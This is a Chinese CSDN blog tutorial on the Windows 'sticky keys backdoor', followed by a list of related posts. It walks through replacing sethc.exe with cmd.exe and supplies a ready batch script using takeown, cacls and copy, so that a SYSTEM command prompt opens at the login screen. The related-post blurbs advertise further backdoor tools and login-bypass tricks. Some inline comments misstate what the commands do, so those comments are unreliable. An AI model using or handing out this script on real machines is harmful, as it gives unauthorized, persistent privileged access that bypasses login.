(windows图形化界)粘滞键后门

已于 2022-03-05 01:57:22 修改
阅读量503 收藏 1
点赞数 2
文章标签: windows 安全
于 2022-03-02 00:07:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60936698/article/details/123219596
版权

(windows图形化界)粘滞键后门

思路:windows图形化界面未登入用户时,连按5次Shift键粘滞键的程序依然可以弹出,若若把粘滞键的程序改为其他程序则有不一样的效果(如cmd程序)。

一、手动直接修改文件名

①在windows 中C:\Windows\System32下找到sethc.exe(辅助功能快捷键),发现无法直接修改文件名且提示《您需要TrustedInstaller提供的权限才能对此文件进行更改》,没有权限,权限属于另一个用户组。

②在管理员权限下修改sethc.exe的所有者

③设置权限

④将sethc.exe文件删除或者修改文件都可。对cmd.exe程序执行上述②③相同步骤,将其命名为sethc.exe。即可实现粘滞键后门。

⑤注销测试

  • Bat

takeown命令用于修改文件或目录所有者,/F参数用于指定文件或目录,/A参数指替换管理员组为所有者/E参数指编辑ACL而不替换,/G参数指赋予指定用户的权限。

takeown /F C:\Windows\System32\sethc.exe /A //将system32目录下的所有文件都修改所有者为本地管理员组

cacls C:\Windows\System32\sethc.exe /E /G administrator:F   //将system32目录下的所有文件的访问控制列表都为管理员组的用户添加完全控制的权限,用于删除文件、重命名。

copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe //删除sethc.exe将cmd.exe的文件名改为sethc.exe

bat脚本如下:



```

takeown /F C:\Windows\System32\sethc.exe /A

cacls C:\Windows\System32\sethc.exe /E /G administrator:F   

copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

```

测试:

注销测试:

魔同
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
可自删除 开启3389创建用户后门的vbs
09-06
开启3389创建用户后门,作研究使用,请勿违法。
漏洞,按5下shift后,windows就执行了system32下的sethc.exe
weixin_30781433的博客
06-19 430
漏洞,按5下shift后,windows就执行了system32下的sethc.exe Windows。是按5下shift后,windows就执行了system32下的sethc.exe。即使 在3389中,都可以弹出!! 它本来是为不方便按组合的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了...
windows系列(server 2008,win7,win10)安装,激活,及修改密码
qq_45953122的博客
08-19 5587
windows系列(server 2008,win7,win10)安装,激活,以及在忘记密码的情况下如何修改密码
Win7系统提示找不到sethc.exe文件的解决办法
最新发布
file
03-12 368
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个sethc.exe文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现sethc.exe丢失要怎么解决?
Windows系统缺失wpnapps.dll文件如何解决?
amio555的专栏
07-03 293
其实很多用户玩单机游戏或者安装软件的时候就出现过这种问题,如果是新手第一时间会认为是软件或游戏出错了,其实并不是这样,其主要原因就是你电脑系统的该dll文件丢失了或没有安装一些系统软件平台所需要的动态链接库,这时你可以下载这个wpnapps.dll文件(挑选合适的版本文件)把它放入到程序或系统目录中,当我们执行某一个.exe程序时,相应的DLL文件就会被调用,因此将缺失的文件放回到原目录之后就能打开你的软件或游戏了.那么出现wpnapps.dll丢失要怎么解决?
shift快捷
mingyqf的博客
02-18 331
shift快捷 Windows------C:\windows\system32\sethc.exe,它本是为不方便按组合的人设计的 Windows系统按5下shift后,Windows就执行了system32下的sethc.exe,也就是启用了 在进程里可以看到是以当前用户的权限运行 但是当我们未登陆系统(停留在登陆面)的时候 系统还不知道我们将以哪个用户登陆,所以在这个时候连续按5次shift后的话系统将会以system用户(具有管理员级别的权限)来运行sethc.exe这个程序
一个delphi和C写的后门
06-03
标题 "一个delphi和C写的后门" 提示了这个压缩包包含的是一个用 Delphi 和 C 语言编写的恶意软件样本,具体来说是一个利用“”功能的后门程序。Windows 操作系统中的一个辅助功能,允许用户在...
后门-自动创建-批处理版(axun)
11-25
Windows系统为帮助有特殊需求的用户设计的功能,当用户连续按下Shift五次时,系统会开启模式,使得每次按下单一的Shift都能保持Shift的功能。这一功能在某些情况下对行动不便或有特殊输入需求的...
360屏蔽windows和系统.docx
09-26
"360屏蔽Windows和系统" 一、概述 在Windows操作系统中,Windows和系统是两个常用的热。然而,在某些情况下,这两个可能会干扰到游戏或其他应用程序的正常运行。为了解决这个问题,360安全卫士...
Windows常见的持久后门汇总1
08-03
Windows常见的持久后门汇总】 在网络安全领域,持久后门是入侵者用来保持对目标系统长期控制的重要手段。一旦攻击者成功突破系统防御,他们会寻找方法在系统中植入后门,确保即使重启或系统恢复后仍能重新...
win10原版文件
08-05
win10原版文件
win7忘记密码,启动恢复
qq_43180941的博客
08-30 1781
win7忘记密码,启动恢复 第1步 调出BIOS系统(一般是气动系统是长按F8),选择启动启动恢复 第2步 点击取消 第3步 点击 查看问题详细信息 第4步 点击 下方这个红框圈起来的连接地址 第5步 第4步点击后会弹出一个选择文件的框,打开C盘,Windows,System32,找到sethc这个文件 1.把这个sethc改个名字,比如sethc-123 2.把sethc改名之后,再找到cmd, 复制贴一份(cmd和sethc同文件夹) 3.把你贴的“cmd - 副本”重命名为sethc 记
关于sethc.exe
01-13 1621
打开你的windows2003服务器3389远程管理客户端,然后连续按5下shift。看看有什么东西!直接调用的置窗口的程序sethc.exe,很多黑客会CMD.exe文件来替换此文件的方式给自己留后门,一般该文件都具有users组的权限,现在的IDC在机器原始配置的时候都很少注意权限分配,再加上一些管理员对这些很陌生,所以很多人忽视了这个地方。 解决办法: 打开你的system32目
五次shift及sethc.exe后门程序的处理
weixin_34120274的博客
01-21 508
****** 2010-06-05 18:31:07 阅读211 评论0 字号:大中小订阅 我的服务器安装了后门,我的网站被挂码,我一清除,又被换上。我得找到根源,后来发现被安装了后门。 以下是处理的方法,不过,服务器***,关还是服务器要没有漏洞、补漏洞。 服务器被******.并被利用了系统的这个漏洞做了后门,在这里我说一下在windows2003...
内网渗透笔记——与系统命令信息收集
wang_zui_zui的博客
01-18 698
内网渗透流程 信息收集 → 漏洞利用 → 提权 → 后门 → 痕迹清除 kali系统 linux,集合了非常多的渗透测试工具 利用后门 原理:在注销的面,连续按shift,依旧会弹出窗口 归根结底跳出来的是一个程序,如果进行程序的改动,就可以被我们利用。 比如: setch.exe → cmd.exe 操作实现 1、在C盘——Windows——System32路径下找到sethc程序,并尝试进行重命名,发现重命名需要权限。 2、进行所有者的更改 将所有者改为自己
解决进系统【加载C:/windows/system32/*.dl出错,找不到指定模块】之类问题的方法
热门推荐
BILL-博客-LLIB
04-17 1万+
   最近看到菜版里有不少板油问,“系统启动时弹出一个提示,说加载*.dll文件出错,找不到指定的模块。”这是个普遍的现象,我本人也遇到过,那时俺还没有来到木蚂蚁,自己摸索了一下解决的,现在看到许多板油也遇到了这样的问题,特在此发一贴,希望遇到此类问题的板油见贴能早点解决,不必重复发贴。我们以曾经一位版友遇到的DTSERV~1.dll为例说明。如系统启动时提示如下:screen.width*0.7
sethc问题
weixin_30512043的博客
05-06 320
有时候在system32目录下总是无法覆盖或者删除,自动还原成原来的,今天又碰到台服务器是这样的。狠下心来要搞好这玩意,以前一直用的是映像劫持,但是这样不安全。 无意间GG搜素了下:sethc.exe 删除。看到首页的一篇文章抱着试试的态度操作了下,没想到竟然行了。 1.运行>gpedit.msc>计算机配置—管理模板--系统--windows文件保护改为已禁用2.再去将...
如何修改启动的程序
PanDaoxi
01-24 2457
如何修改启动的程序!
win10中关于用留下后门
qq_42761527的博客
08-19 3873
win10中的连按五下Shift会出现,那么怎么利用这一漏洞当作后门,登陆别人电脑呢 先要了解和命令提示符的快捷应用是sethc.exe和cmd.exe 而且这两个文件都在win10的c盘下的system32中 通过以上几条命令留下后门 当你在接触别人电脑时,可以通过连续五下shift启动命令提示符,在命令提示符中修改用户登录口令 ...
windows
08-03
Windows是一种功能,它可以使得按在按下后保持按住的状态,而不需要一直按住盘。然而,有时候可能会导致一些不便,比如在按下Shift、Ctrl、Alt等时会发出滴滴声,影响打字。为了解决这个问题,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值